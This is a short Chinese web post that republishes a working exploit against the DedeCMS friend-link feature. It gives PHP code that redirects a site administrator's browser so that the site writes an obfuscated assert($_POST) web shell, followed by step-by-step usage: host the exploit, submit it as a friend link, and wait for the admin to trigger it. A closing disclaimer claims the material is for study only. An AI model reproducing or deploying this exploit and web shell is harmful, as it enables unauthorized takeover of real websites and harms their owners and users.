【摘要】漏洞详情:http://0day5.com/archives/4209/EXP:<?php//print_r($_SERVER);$referer=$_SERVER['HTTP_REFERE...
漏洞详情:
http://0day5.com/archives/4209/
EXP:
<?php//print_r($_SERVER);$referer = $_SERVER['HTTP_REFERER'];$dede_login = str_replace("friendlink_main.php","",$referer);$muma = '<'.'?'.'a'.'s'.'s'.'e'.'r'.'t'.'('.'$'.'_'.'P'.'O'.'S'.'T'.'['.'\''.'a'.'\''.']'.')'.';'.'?'.'>';$exp = 'tpl.php?action=savetagfile&actiondo=addnewtag&content='. $muma .'&filename=shell.lib.php';$url = $dede_login.$exp;//echo $url;header("location: ".$url);// send mail coderexit();?>
使用方法:
1.保存上方exp,上传至服务器;
2.访问目标网站:http://www.test.com/plus/flink.php
链接填写部署的exp的URL;
3.等待管理员触发,得到shell地址http://www.test.com/include/taglib/dy.lib.php
1.本站大部分内容均收集于网络!若内容若侵犯到您的权益,请发送邮件至:duhaomu@163.com,我们将第一时间处理!
2.资源所需价格并非资源售卖价格,是收集、整理、编辑详情以及本站运营的适当补贴,并且本站不提供任何免费技术支持。
3.所有资源仅限于参考和学习,版权归原作者所有,更多请阅读网站声明。